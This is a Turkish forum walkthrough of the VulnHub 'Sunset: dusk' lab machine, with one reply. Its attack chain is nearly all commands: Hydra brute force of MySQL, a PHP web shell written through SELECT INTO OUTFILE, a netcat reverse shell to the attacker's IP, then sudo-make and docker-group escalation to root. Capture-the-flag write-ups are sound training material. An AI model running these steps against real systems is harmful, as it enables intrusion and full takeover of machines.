Sunset:Dusk Zafiyetli Makinesinin Çözümü//"P4RS

P4RS

Özel Üye
8 Ocak 2017
5,156
58
Ankara
Merhabalar TürkHackTeam ailesi, bugün sizlere Sunset:dusk VulnHub Zafiyetli Makinesinin Çözümünü göstereceğim.


SRCG6a.png


https://www.vulnhub.com/entry/sunset-dusk,404/


KElkup.png


Makine İsmi: Sunset: dusk

Yayınlanma Tarihi: 1 Aralık 2019

Yapımcı: whitecr0wz

Seri: sunset

Açıklama: Hedefde ki user.txt ve root.txt dosyalarında ki flag'ı almak

Dosya Boyutu: 1.1 GB

İşletim Sistemi: Linux

Zorluk Derecesi: Kolay


vIIM11.png


İlk olarak makinenin IP adresini öğrenmek için
Kod:
sudo netdiscover
yazalım.

p0Opfs.png


Makinenin IP adresini öğrendik.

fECj6z.png


Şimdi açık portları öğrenmek ve yolumuzu çizmek için NMAP taraması yapacağız. Terminale
Kod:
nmap -A IP_adresi
yazalım.

Burada önemli nokta mysql'in açık olması

HvIWV8.png


qUo6yE.png


80 portu açıktı ve bir site olduğunu anladık, siteye girdiğimiz de sitede pekte bir şey bulamadık.

bPKg5x.png


Ardından Hydra aracı ile MySQL'e Brute saldırı yapacağız. Bunun için
Kod:
hydra -L kullanıcı_adı_listesi -P şifre_listesi IP_adresi mysql
yazalım. Gördüğünüz gibi bilgiyi aldık kullanıcı adı: root şifre: password

ZNDMhj.png


Ardından sitenin 8080 portuna gittim ve /var/tmp olduğumuzu söylüyor bize. MySQL'i kullanarak buraya veri atacağız birazdan.

NfwdaB.png


MySQL'e giriş yapmak için
Kod:
mysql -h IP_adresi -u root -p
yazalım ve şifreyi girelim. Ardından https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php buraya giderek kodları kopyalayıp bir php dosyası oluşturalım. Bu kodlarda biraz aşağıda CHANGE THİS kısımları var.
Kod:
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
burada $ip = kendi makineninizin IP adresinizi yazınız.
Ardından MySQL'e
Kod:
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/p4rs.php' ;
p4rs.php dosyasını ben kendim oluşturdum siz başka isimde de oluşturabilirsiniz.

yppfBY.png


Tarayıcıya IP_adresi:8080 yazdığımızda kendi oluşturduğumuz dosyamız içeride gördüğünüz gibi.

86o9vZ.png


Tarayıcıya gelerek
Kod:
http://IP_adresi:8080/p4rs.php?cmd=id
yazdığımızda RCE komutu gördüğünüz gibi sistemde çalıştı.

TnTUvo.png


Şimdi terminali açalım ve portu dinlemeye alalım
Kod:
nc -lvp 1234
. Ardından tarayıcıya da
Kod:
http://IP_adresi:8080/p4rs.php?cmd=nc -e /bin/bash Kendi_IP_adresiniz 1234
yazalım ve içeri girelim.

1MOVdH.png


Bağlantı kuruldu ve içeri girdik, kabuk yükseltmesi için
Kod:
python -c "import pty;pty.spawn('/bin/bash')"
yazalım. Ardından home dizinine girip dusk dizinine girelim. Gördüğünüz gibi orada user.txt dosyasını bulduk yazdıralım ve ilk bayrağı alalım.

TxKRJj.png


Sudo haklarını öğrenmek için sudo -l yazdık. Şimdi exploit ederek içeri girmek için
Kod:
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
yazdık. groups yazdığımızda docker grubunda olduğunu öğrendik.

DOGB8C.png


Docker'ı kullanarak yapacağız ancak fotoğrafta gözükmemiş orada. -v parametresi istediğimiz bir şeyi oluşturmak için -i ve -t kabuk moduna girmek için kullanılır.

Kod:
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
yazdık ve birkaç veri oluşturdu, içeri girdik.
id dediğimiz de root yetkisinde olduğumuzu gördük. Direk
Kod:
cd /root
yazdık ve root dizinine girdik.
Kod:
ls
yazdığımızda root.txt dosyası olduğunu gördük ve yazdırdık.

Cxw7Bq.png


W6LxrA.png


Gördüğünüz gibi iki bayrağı da aldık :))
2XgsJc.png





Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla...

 

x4807

Katılımcı Üye
10 Ağu 2019
985
17
Ellerinize sağlık hocam böyle zaafiyetli makine çözüm konuları hoş oluyor :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.